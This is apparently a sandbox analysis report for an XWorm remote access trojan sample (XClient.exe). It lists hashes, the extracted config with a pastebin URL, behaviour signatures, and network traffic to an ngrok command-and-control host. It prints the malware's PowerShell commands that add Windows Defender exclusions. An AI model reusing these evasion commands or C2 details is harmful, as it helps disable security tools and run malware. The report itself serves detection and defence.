Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

03/09/2024, 14:02 UTC

240903-rb57sazdqf 10

03/09/2024, 13:51 UTC

240903-q59avszclf 10

02/09/2024, 19:51 UTC

240902-yk8gtsxbpd 10

02/09/2024, 02:27 UTC

240902-cxh7tazflg 10

02/09/2024, 02:26 UTC

240902-cwxc2sygll 10

21/06/2024, 19:37 UTC

240621-yca7cszgnd 10

09/06/2024, 17:07 UTC

240609-vm7rjadd73 10

13/05/2024, 17:36 UTC

240513-v6qblafe3y 10

12/05/2024, 17:17 UTC

240512-vty3zafh5s 10

Analysis

  • max time kernel
    148s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    12/05/2024, 17:17 UTC

General

  • Target

    RAT/XClient.exe

  • Size

    172KB

  • MD5

    75ba783757c5b61bd841afa136fc3eda

  • SHA1

    8db9cda9508471a23f9b743027fa115e01bc1fe1

  • SHA256

    75a8719e83e4aecbe51287d7bfaf1e334fa190c7784324f24bcf61ab984de20a

  • SHA512

    9a6cfbf4302336662527837bf60b30b458f8d438bd6e9563093d4948bf81c79d56578e965d836e90aafde553d1cdc9c6df81a254aafcfb3379fbe6405dce0ea1

  • SSDEEP

    1536:vJcr5kCyoAp30kaF6CiJzt7UbjFdZe8e6TOAJkU7JsOpysa7iAMI:BcmNNxda6zZUbjHZe8jO6H2OpYuAf

Malware Config

Extracted

Family

xworm

Attributes
  • Install_directory

    %AppData%

  • install_file

    XClient.exe

  • pastebin_url

    https://pastebin.com/raw/2jTT3Lnj

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\RAT\XClient.exe
    "C:\Users\Admin\AppData\Local\Temp\RAT\XClient.exe"
    1⤵
    • Drops startup file
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1616
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RAT\XClient.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2724
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2628
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2756
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:548

Network

  • flag-us
    DNS
    ip-api.com
    XClient.exe
    Remote address:
    8.8.8.8:53
    Request
    ip-api.com
    IN A
    Response
    ip-api.com
    IN A
    208.95.112.1
  • flag-us
    GET
    http://ip-api.com/line/?fields=hosting
    XClient.exe
    Remote address:
    208.95.112.1:80
    Request
    GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Sun, 12 May 2024 17:18:16 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 6
    Access-Control-Allow-Origin: *
    X-Ttl: 57
    X-Rl: 41
  • flag-us
    DNS
    pastebin.com
    XClient.exe
    Remote address:
    8.8.8.8:53
    Request
    pastebin.com
    IN A
    Response
    pastebin.com
    IN A
    104.20.3.235
    pastebin.com
    IN A
    104.20.4.235
    pastebin.com
    IN A
    172.67.19.24
  • flag-us
    GET
    https://pastebin.com/raw/2jTT3Lnj
    XClient.exe
    Remote address:
    104.20.3.235:443
    Request
    GET /raw/2jTT3Lnj HTTP/1.1
    Host: pastebin.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Sun, 12 May 2024 17:18:19 GMT
    Content-Type: text/plain; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-xss-protection: 1;mode=block
    cache-control: public, max-age=1801
    CF-Cache-Status: HIT
    Age: 2
    Last-Modified: Sun, 12 May 2024 17:18:17 GMT
    Server: cloudflare
    CF-RAY: 882c113e9afd60de-LHR
  • flag-us
    DNS
    7.tcp.eu.ngrok.io
    XClient.exe
    Remote address:
    8.8.8.8:53
    Request
    7.tcp.eu.ngrok.io
    IN A
    Response
    7.tcp.eu.ngrok.io
    IN A
    35.157.111.131
  • flag-us
    DNS
    7.tcp.eu.ngrok.io
    XClient.exe
    Remote address:
    8.8.8.8:53
    Request
    7.tcp.eu.ngrok.io
    IN A
    Response
    7.tcp.eu.ngrok.io
    IN A
    3.124.67.191
  • flag-us
    DNS
    7.tcp.eu.ngrok.io
    XClient.exe
    Remote address:
    8.8.8.8:53
    Request
    7.tcp.eu.ngrok.io
    IN A
    Response
    7.tcp.eu.ngrok.io
    IN A
    3.68.56.232
  • 208.95.112.1:80
    http://ip-api.com/line/?fields=hosting
    http
    XClient.exe
    264 B
    307 B
    4
    3

    HTTP Request

    GET http://ip-api.com/line/?fields=hosting

    HTTP Response

    200
  • 104.20.3.235:443
    https://pastebin.com/raw/2jTT3Lnj
    tls, http
    XClient.exe
    869 B
    5.7kB
    10
    10

    HTTP Request

    GET https://pastebin.com/raw/2jTT3Lnj

    HTTP Response

    200
  • 35.157.111.131:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 35.157.111.131:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 35.157.111.131:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 35.157.111.131:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 35.157.111.131:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 35.157.111.131:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 35.157.111.131:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 35.157.111.131:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 35.157.111.131:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    80 B
    3
    2
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 3.68.56.232:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 3.68.56.232:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 8.8.8.8:53
    ip-api.com
    dns
    XClient.exe
    56 B
    72 B
    1
    1

    DNS Request

    ip-api.com

    DNS Response

    208.95.112.1

  • 8.8.8.8:53
    pastebin.com
    dns
    XClient.exe
    58 B
    106 B
    1
    1

    DNS Request

    pastebin.com

    DNS Response

    104.20.3.235
    104.20.4.235
    172.67.19.24

  • 8.8.8.8:53
    7.tcp.eu.ngrok.io
    dns
    XClient.exe
    63 B
    79 B
    1
    1

    DNS Request

    7.tcp.eu.ngrok.io

    DNS Response

    35.157.111.131

  • 8.8.8.8:53
    7.tcp.eu.ngrok.io
    dns
    XClient.exe
    63 B
    79 B
    1
    1

    DNS Request

    7.tcp.eu.ngrok.io

    DNS Response

    3.124.67.191

  • 8.8.8.8:53
    7.tcp.eu.ngrok.io
    dns
    XClient.exe
    63 B
    79 B
    1
    1

    DNS Request

    7.tcp.eu.ngrok.io

    DNS Response

    3.68.56.232

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    89b21b247053d6078a488b25f9418948

    SHA1

    3bc31609ea0db6cce2ea19da940f1a7791efd49f

    SHA256

    f69e1e89ef2db2c4ec8f292e751a9ae2b2b8ccfb9505af440b2299c086fc2972

    SHA512

    4c07248e43c6faeb4e6a6426bc12bf443e1e200cec8170a743eb66ad718d400104b3bb4f7c8fbe5b04bd8315eca77e1bb443141d7a880b8ae4c87cd39d308b06

  • memory/1616-0-0x000007FEF50E3000-0x000007FEF50E4000-memory.dmp

    Filesize

    4KB

  • memory/1616-1-0x0000000001010000-0x0000000001040000-memory.dmp

    Filesize

    192KB

  • memory/1616-2-0x000007FEF50E0000-0x000007FEF5ACC000-memory.dmp

    Filesize

    9.9MB

  • memory/1616-32-0x000007FEF50E3000-0x000007FEF50E4000-memory.dmp

    Filesize

    4KB

  • memory/1616-33-0x000007FEF50E0000-0x000007FEF5ACC000-memory.dmp

    Filesize

    9.9MB

  • memory/2628-14-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

    Filesize

    2.9MB

  • memory/2628-15-0x00000000022C0000-0x00000000022C8000-memory.dmp

    Filesize

    32KB

  • memory/2724-8-0x0000000002890000-0x0000000002898000-memory.dmp

    Filesize

    32KB

  • memory/2724-7-0x000000001B450000-0x000000001B732000-memory.dmp

    Filesize

    2.9MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.